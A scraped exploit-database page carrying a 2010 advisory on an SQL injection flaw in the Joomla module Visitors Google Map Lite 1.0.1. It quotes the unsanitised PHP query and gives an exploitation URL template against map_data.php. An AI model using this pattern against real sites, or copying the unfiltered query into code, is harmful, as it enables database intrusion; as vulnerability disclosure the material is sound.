0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Visitors Google Map Lite 1.0.1 mod_visitorsgooglemap SQL Injection
================================================================== Visitors Google Map Lite 1.0.1 mod_visitorsgooglemap SQL Injection ================================================================== - Discovered by : Chip D3 Bi0s - Email : chipdebios[at]gmail[dot]com - Group : LatinHackTeam - Date : 2010-09-08 - Where : From Remote ------------------------------------------------------------------------------------- Affected software description Application : Visitors Google Map Lite 1.0.1 (FREE) (module:mod_visitorsgooglemap) Developer : Serdar Gökkus Compatibility : Joomla 1.5 Native License : GPLv2 or later Date Added : Sunday August 29, 2010 01:14:14 Download : http://www.comlantis.com/download/doc_download/2-visitors-google-map-lite-101-free.html I. BACKGROUND This extension tracks visitors of your site in real time and displays their locations in Google Map. It uses three main technologies: - Map API of Google - AJAX - IP geolocation API of IPInfoDB Content of VisitorsGoogeMap Package: This extension contains one Joomla Compoment and two Joomla Modules. com_visitorsgooglemap: This component is responsible for the creation database table during installation and remove it clearly in case of uninstallation. mod_visitorsgooglemap: This module is responsible for the display of Google Map in desired module position in your template and track the visitors of your Joomla page in the map. mod_visitorsgooglemap_agent: This module is responsible for the updating visitors information in the database. II. DESCRIPTION Some sql injecton vulnerabilities exist in mod_visitorsgooglemap module . III. ANALYSIS The bug is in the following files, specifying the lines /mod_visitorsgooglemap/map_data.php [16] [if ($_GET['action'] == 'listpoints') [17] { [18] $lastMarkerID = $_GET['lastMarkerID']; [19] ini_set('default_mimetype','text/xml'); // manchmal notwendig [20] header ('Content-Type: text/xml'); // reicht nicht immer [21] echo '<?xml version="1.0" ?>'; [22] echo '<xmlresponse>'; [23] $database =& JFactory::getDBO(); [24] $query = "SELECT * FROM #__visitorsgooglemap_location where id > $lastMarkerID order by id"; Explanation:As noted in the line [24] $ lastMarkerID nowhere is filtered, which result in a query pede unexpected IV. EXPLOITATION http://site/path/modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0{sql} +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++ # 0day.today [2024-09-28] #